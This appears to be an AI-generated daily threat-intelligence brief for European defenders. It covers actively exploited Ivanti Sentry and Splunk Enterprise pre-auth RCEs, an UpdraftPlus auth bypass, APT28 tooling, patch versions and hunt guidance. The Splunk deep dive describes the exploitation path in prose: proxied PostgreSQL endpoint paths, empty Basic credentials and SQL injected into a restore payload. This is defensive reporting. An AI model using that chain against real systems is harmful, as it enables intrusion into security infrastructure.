ctipilot.ch

CTI Daily Brief — 2026-06-14

Typedaily
Date2026-06-14
GeneratorClaude Opus 4.8 (`claude-opus-4-8`)
ClassificationTLP:CLEAR
LanguageEnglish
Promptv2.60
Items7
CVEs7
On this page

On this page

Tags (21)
Regions (5)
References (18)

0. TL;DR

  • Ivanti Sentry CVE-2026-10520 (CVSS 10.0, pre-auth OS command injection) is being exploited in the wild — Shadowserver confirmed at least two internet-exposed gateways were backdoored shortly after the public PoC. CISA added it to KEV on 11–12 June; Swiss/EU public-sector MDM estates running Sentry ≤ R10.5.1 / ≤ R10.6.1 / ≤ R10.7.0 must patch and compromise-assess now (Security Affairs, 2026-06-11). See § 0 callout and § 4.
  • Splunk Enterprise pre-auth RCE (CVE-2026-20253, CVSS 9.8) — your SIEM is the target. watchTowr detailed an unauthenticated path that proxies an internal PostgreSQL-sidecar REST API with empty credentials, reaching code execution during a crafted backup/restore; Splunk-on-AWS is vulnerable out of the box (watchTowr Labs, 2026-06-12). See § 5.
  • UpdraftPlus WordPress backup plugin (CVE-2026-10795, CVSS 8.1) — unauthenticated auth-bypass to RCE, 3 M+ installs. A failed-RSA-decrypt collapse to an all-zero AES key lets an unauthenticated attacker forge RPC commands and upload a plugin for RCE; Wordfence shipped firewall-rule protection to customers ahead of broad disclosure and the exploitation mechanism is public (WPScan, 2026-06-11). Patch to 1.26.5. See § 2.
  • APT28 (GRU Unit 26165) tradecraft has moved to LLM-driven and cloud-native evasion. Sekoia documents LameHug — the first APT28 stealer that generates exfiltration code at runtime via a hosted LLM — plus BeardShell C2 over consumer cloud-storage providers and the FrostArmada SOHO-router DNS-hijack AiTM campaign against Microsoft 365 (Sekoia TDR, 2026-06-11). See § 3.
  • EU ran Cyber Europe 2026 and activated the Cybersecurity Reserve for the first time; Switzerland participated as a partner country. The exercise tested the 2025 EU Cyber Blueprint against a cross-border rail/maritime OT crisis scenario (ENISA, 2026-06-11). See § 1.

Immediate Action — patch Ivanti Sentry now and hunt for an implanted gateway. CVE-2026-10520 is an unauthenticated CVSS 10.0 OS command-injection in the Ivanti Sentry MICS interface that yields root on the appliance; shortly after watchTowr's public proof-of-concept the Shadowserver Foundation observed mass exploitation attempts and confirmed at least two of the then-19 internet-exposed instances had already been backdoored (Security Affairs, 2026-06-11; CERT-EU 2026-008, 2026-06-10). A root compromise of Sentry exposes every mailbox, calendar and enterprise application the gateway brokers. Upgrade to R10.5.2 / R10.6.2 / R10.7.1 immediately, restrict the MICS listener to management networks, and treat any internet-reachable instance as presumed-compromised — audit for unexpected cron entries, authorized_keys changes and anomalous children of the MICS Java process before declaring it clean.

3. Research & Investigative Reporting

Sekoia: APT28 (GRU Unit 26165) tradecraft shifts to LLM-generated payloads and cloud-native C2 [SINGLE-SOURCE]

Sekoia's Threat Detection & Research team published a tradecraft-evolution retrospective on APT28 (Fancy Bear / Forest Blizzard), and the operationally relevant material is the 2025–2026 tooling (Sekoia TDR, 2026-06-11). Three developments stand out for European defenders. LameHug is the first documented APT28 infostealer that delegates its logic to a large language model: base64-encoded prompts are sent to Alibaba's Qwen 2.5-Coder model via the Hugging Face inference API to generate collection and exfiltration code on the fly, observed against Ukrainian government targets — meaning the malicious behaviour is not statically present in the binary. BeardShell is a C++ backdoor that rotates its command-and-control across consumer cloud-storage providers (Koofr, Icedrive, Filen), defeating domain/IP blocklisting because the traffic is ordinary HTTPS to legitimate services. FrostArmada (April 2026) is a SOHO-router DNS-hijack campaign — 18,000-plus unique IPs across 120-plus countries — that rewrites DHCP/DNS on MikroTik and TP-Link devices to mount adversary-in-the-middle attacks against Microsoft 365 sign-ins (T1557 Adversary-in-the-Middle, T1071.001 Web Protocols for the cloud C2). Sekoia notes APT28's GooseEgg implant (CVE-2022-38028) ran for roughly five years before public disclosure — a reminder that current tools likely carry a similar blind-spot horizon.

Why it matters to us: NATO European ministries, defence suppliers and critical-infrastructure operators are named in the targeting. The detection priorities are concrete and IoC-free: hunt cloud-storage beaconing to Koofr/Icedrive/Filen from non-user workstations, alert on outbound traffic to Hugging Face inference endpoints from Windows hosts, monitor MikroTik/TP-Link DNS-setting changes in network-device logs, and treat Office documents delivered through Signal Desktop as a Mark-of-the-Web bypass risk — Sekoia notes APT28 uses the messenger to deliver Office lures that arrive without the Mark-of-the-Web protection.

4. Updates to Prior Coverage

UPDATE: Ivanti Sentry CVE-2026-10520 — exploitation confirmed in the wild, gateways backdoored

UPDATE (originally covered 2026-06-10): the Ivanti Sentry MICS command-injection covered last week as an advisory-plus-patch story is now confirmed exploited. After watchTowr published a working proof-of-concept on 10 June, the Shadowserver Foundation observed mass exploitation attempts and confirmed that at least two of the then-19 internet-exposed Sentry instances had been backdoored shortly after the PoC went public (Security Affairs, 2026-06-11).

The flaw (CVSS 10.0) is reachable by an unauthenticated POST to the MICS handleMessage interface and executes arbitrary OS commands as root, giving an attacker control over every mailbox, calendar and enterprise application the gateway brokers (T1190 Exploit Public-Facing Application; T1505.003 Web Shell post-exploitation). CISA added the CVE to its Known Exploited Vulnerabilities catalog on 11 June and CERT-EU issued advisory 2026-008 urging immediate upgrade (CERT-EU 2026-008, 2026-06-10; BleepingComputer, 2026-06-12). The operational driver is the confirmed in-the-wild backdooring, not any compliance date: any internet-reachable Sentry should be treated as presumed-compromised and compromise-assessed, not merely patched. Affected: Sentry ≤ R10.5.1, ≤ R10.6.1, ≤ R10.7.0; fixed in R10.5.2 / R10.6.2 / R10.7.1. See the § 0 Immediate Action callout and § 6.

Changes since first coverage(2 prior appearances)
  1. 2026-06-142026-W24Consolidated in § 1 (highest-impact); exploitation confirmed, gateways backdoored
  2. 2026-06-102026-06-10First coverage. Public PoC same-day; no confirmed ITW; patch R10.5.2/R10.6.2/R10.7.1.

5. Deep Dive — Splunk Enterprise CVE-2026-20253: pre-auth RCE in the SIEM via an unauthenticated PostgreSQL sidecar proxy

The uncomfortable angle on this one is that the vulnerable software is the tool many readers use to find intrusions. CVE-2026-20253 (CVSS 9.8, CWE-306 Missing Authentication for Critical Function) is an unauthenticated remote code execution flaw in Splunk Enterprise, disclosed in Splunk's advisory SVD-2026-0603 on 10 June and dissected by watchTowr Labs on 12 June (Splunk SVD-2026-0603, 2026-06-10; watchTowr Labs, 2026-06-12). It affects Splunk Enterprise 10.0.0–10.0.6 and 10.2.0–10.2.3.

The mechanism. Recent Splunk Enterprise ships a PostgreSQL sidecar service (the splunk-postgres component) that exposes a Go-based REST API on loopback port 5435 — including /v1/postgres/recovery/backup and /v1/postgres/recovery/restore endpoints — and that internal API performs no authentication, on the assumption that only loopback callers can reach it (watchTowr Labs, 2026-06-12). The flaw is that Splunk's main web tier proxies those same endpoints outbound, at paths under /en-US/splunkd/__raw/v1/postgres/, so an external client can reach the no-auth database API by sending empty Basic credentials. From there an attacker writes attacker-controlled files into the sidecar's runtime directory and injects SQL into a crafted backup/restore payload, achieving code execution during the database restore step. watchTowr reports that Splunk Enterprise on AWS is vulnerable in its default configuration because the PostgreSQL sidecar is enabled out of the box, whereas on-premises Windows installs are exposed only where the sidecar has been explicitly enabled (watchTowr Labs, 2026-06-12).

Why the "loopback is safe" assumption fails. The root cause is a trust boundary that exists in the developers' mental model but not in the deployed architecture: the database API trusts the network (loopback-only) instead of the caller, and a second component (the web proxy) silently bridges that network gap. This is the recurring pattern watchTowr highlights — app-level auth was skipped because "the database has auth," but the proxy made the database reachable without it. The mapping is straightforward: T1190 (Exploit Public-Facing Application) for the initial unauthenticated reach, leading to execution on the host (T1059 Command and Scripting Interpreter). Because Splunk frequently runs with high privilege and aggregates logs from across the estate, a compromised indexer or search head is both an execution foothold and a route to the organisation's centralised security telemetry — an attacker who owns the SIEM can read what defenders see and potentially tamper with it.

Hunt and detection concepts. Splunk logs its own HTTP access, so the highest-value hunt is in _internal / the splunkd_access data: look for requests to /en-US/splunkd/__raw/v1/postgres/ paths, especially recovery/backup and recovery/restore, and for requests carrying empty or anonymous Basic-auth credentials from non-loopback source addresses. Unexpected PostgreSQL backup/restore operations in Splunk's operational logs outside a defined maintenance window are a second signal. On the host, watch for child processes spawned by the Splunk service account that are inconsistent with normal operation (shells, interpreters), and for new files appearing under the sidecar's pkg-run runtime path. Because this is the monitoring platform itself, forward Splunk's own access and audit logs to an independent collector so that a post-compromise log wipe on the box does not also erase the evidence of the intrusion.

Hardening and remediation. Upgrade to a fixed release — 10.4.0, 10.2.4 or 10.0.7 (Splunk SVD-2026-0603, 2026-06-10) — and prioritise internet-facing and AWS-hosted deployments, the latter because watchTowr reports the sidecar is enabled there by default. On on-premises installs that do not need the PostgreSQL sidecar, confirm it is disabled and stays disabled after the upgrade. Network-side, no Splunk management or web interface should be exposed to the internet; restrict it to administrative networks and place it behind authenticated access controls. There is no reported in-the-wild exploitation at the time of writing, but a public technical analysis of a pre-auth RCE in a widely deployed SIEM closes the gap between disclosure and weaponisation quickly — treat this as an urgent change, not a routine one.

6. Action Items

  • Patch internet-exposed Ivanti Sentry now and compromise-assess — do not just patch (CVE-2026-10520). Upgrade to R10.5.2 / R10.6.2 / R10.7.1, restrict the MICS listener to management networks, and because exposed gateways are confirmed backdoored, audit for persistence (unexpected cron entries, authorized_keys changes, anomalous children of the MICS Java process) before declaring any instance clean. Pre-auth CVSS 10.0 RCE with confirmed in-the-wild backdooring. See § 0 and § 4.
  • Upgrade Splunk Enterprise to 10.4.0 / 10.2.4 / 10.0.7, AWS-hosted instances first (CVE-2026-20253). Pre-auth RCE via the default-enabled PostgreSQL sidecar proxy; ensure no Splunk web/management interface is internet-facing, confirm the sidecar stays disabled on on-prem installs that don't use it, and forward Splunk's own access logs off-box. Hunt /en-US/splunkd/__raw/v1/postgres/ requests with empty Basic-auth from non-loopback sources. See § 5.
  • Update UpdraftPlus to 1.26.5 across all WordPress estates and disable unused UpdraftCentral/Migrator keys (CVE-2026-10795). Unauthenticated auth-bypass to RCE on 3 M+ installs; the exploitation mechanism is public and Wordfence has shipped preventive rules. Hunt for plugin upload/activation outside change windows and udrpc_message POSTs to admin-ajax.php. See § 2.
  • Hunt for APT28's current evasion classes (no IOCs required). Alert on cloud-storage beaconing to Koofr/Icedrive/Filen from non-user workstations, outbound traffic to Hugging Face inference endpoints from Windows hosts, MikroTik/TP-Link DNS-setting changes in device logs, and Office documents delivered via Signal Desktop that lack the Mark-of-the-Web (an APT28 Office-lure delivery path). See § 3.
  • Audit removable backup-media controls. Verify backup media leaving server rooms is encrypted at rest, asset-tagged and access-logged — the Kyushu Electric loss (10.9 M records, unencrypted SSD) is a NIS2 Article 21(2)(h)-class failure with no remote attacker. See § 1.

7. Verification Notes

  • Items dropped — already covered (PD-8), no material delta: "GreatXML" BitLocker bypass (covered 2026-06-12; still no CVE/patch, no new exploitation); Velvet Ant "Operation Highland" Linux auth-stack backdooring (was the 2026-06-13 deep dive — deep dives are not re-summarised, PD-9); ServiceNow unauthenticated REST endpoint (covered 2026-06-11); University of Nottingham / CVE-2026-35273 ShinyHunters breach (the 455 K-record / multi-campus / ICO-notification facts were already in the 2026-06-12 and 2026-06-13 UPDATEs — a third consecutive update is barred by the long-running-campaign rule; the only new element, Have I Been Pwned indexing, is not material).
  • CVEs that did not clear a § 2 inclusion gate: CVE-2026-47210 (vm2 Node.js sandbox escape, CVSS 9.8) — primary disclosure dated 2026-05-29 (GitLab advisory metadata refreshed 06-12), outside the recency window, no in-the-wild exploitation or public PoC confirmed; relevance is to code-evaluation sandboxes rather than internet-exposed services. CVE-2026-12183 (BUK TS-G gas-station automation auth-bypass, CVSS 9.8) — ENISA EUVD flags it exploited with a public PoC, but the only available sources are a per-CVE aggregator page (CIRCL Vulnerability Lookup) and a low-reliability news aggregator; no vendor or national-CERT advisory exists, and the product is a Russian-developed system with negligible Swiss/EU public-sector deployment.
  • Items dropped — below the daily relevance bar: INTERPOL Operation Ramz / SniperDz PhaaS takedown (201 arrests, MENA region — significant but indirect CH/EU nexus and no 1–7-day defender action); 23andMe $46.75 M breach-settlement approval (civil-liability closure of the 2023 breach; no defender action); Great Marlow School UK ICT incident (resolved in under 48 h with "no threat identified"; limited operational lesson).
  • Single-source items: § 3 APT28 tradecraft evolution rests on the Sekoia TDR report alone — it is primary research (the lab's own analysis), so the attribution and TTP claims are presented as Sekoia's findings; no independent corroboration of the LameHug/BeardShell/FrostArmada specifics was located in-window.
  • Contradictions: none material this run.
  • Sub-agents: all four (S1–S4) returned within budget; all ran on Claude Sonnet 4.6.
  • Coverage gaps: inside-it-ch (Cloudflare Managed Challenge — bridge returned no body; no unique in-window Swiss items beyond those captured elsewhere); sophos-xops (feed 503); group-ib (press-release 503 — INTERPOL/Infosecurity used instead, story covered anyway); databreaches-net (403 — BleepingComputer/TechTimes corroborated the Kyushu story); sec-disclosures-edgar (0 qualifying Item 1.05 8-K filings in window — confirmed absence, not a transport failure); cert-fr-actu (RSS feed stale, returning October 2025 items); prodaft (not fetched within time budget); cnil-fr, edpb, ico-uk (no new in-window notices).